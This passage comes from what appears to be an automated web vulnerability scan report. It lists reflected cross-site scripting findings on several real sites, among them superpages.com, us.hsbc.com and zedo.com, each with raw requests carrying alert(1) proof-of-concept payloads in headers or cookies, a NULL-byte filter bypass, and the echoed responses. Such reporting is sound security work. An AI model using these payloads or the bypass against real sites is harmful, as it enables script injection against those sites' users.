s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: %00ba07d"-alert(1)-"85da7928a00
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24677


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="%00ba07d"-alert(1)-"85da7928a00";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

var remote_add = "REMOTE_ADDR=173.193.214.243";
var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80";
var datServ = 'http://ugc-int.superpages.com';
var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/";
var imServ = 'http://media.superpages.com/media/photos/';
var lidforpageload = '2118
...[SNIP]...

1.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:17 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:17 GMT
Vary: User-Agent,Cookie
Content-Length: 5930
Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r"+expires+"; path=/";


               window.location="http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc"
</script>
...[SNIP]...

1.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Date: Thu, 03 Feb 2011 18:54:52 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db&_segment=2%7CgFEcJzqCjXJj59a51'-alert(1)-'a6f6442db%7C"/>
...[SNIP]...

1.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2536

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2549

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:10:02 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:27 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1b5e532c19; expires=Fri, 03-Feb-2012 18:54:27 GMT; domain=.newstogram.com
Content-Length: 167

Newstogram.completed({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'6897e<img src=a onerror=alert(1)>f1b5e532c19","ip":"173.193.214.243"}})

1.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

